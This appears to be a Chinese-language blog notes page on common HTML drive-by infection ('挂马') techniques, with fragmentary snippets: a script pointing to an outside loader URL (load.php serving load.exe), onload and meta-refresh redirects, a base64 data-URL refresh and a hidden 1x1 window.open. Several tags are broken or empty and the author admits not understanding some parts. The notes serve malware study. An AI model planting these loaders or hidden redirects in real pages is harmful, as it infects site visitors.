Virus_Html_SampleAnalysis

本篇讲Html的挂马的常见手法.

0x1 简单的html挂马–frame框架

查看站点是否被挂，一般是查找一下关键词iframe。

---下面是网上的,还未理解
国外的load.exe
document.getElementById("pdfplace").innerHTML = "";
break;
}
}
var url="http://jl.chura.pl/rc/load.php?id=546983"

http://jl.chura.pl/rc/load.php?id=546983&spl=3
http://jl.chura.pl/rc/load.php?id=546983&spl=2

0x2 VBScript写入本地文件

<SCRIPT Language=VBScript>SCRIPT> 

0x3 最后跳向这里

擦,下面的不用代码标记框起来，会直接跳转…

<body onload="window.location ='http://cn.bing.com/?scope=web';">body>

0x4 待测的方式

1.http-equiv="refresh" content="0; url=data:text/html; base64,....">

2.

3.window.open("","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");　


4.
<a id="qipian" href="http://bbs.pediy.com/">a>


5.<a href="https://www.baidu.com/" target="_blank">  

0x5Samples

Sample-请确认样本只用于测试才下载,其他的我可不负-密码国际惯例

0x6 参考文章

网页挂马方法和技巧大汇总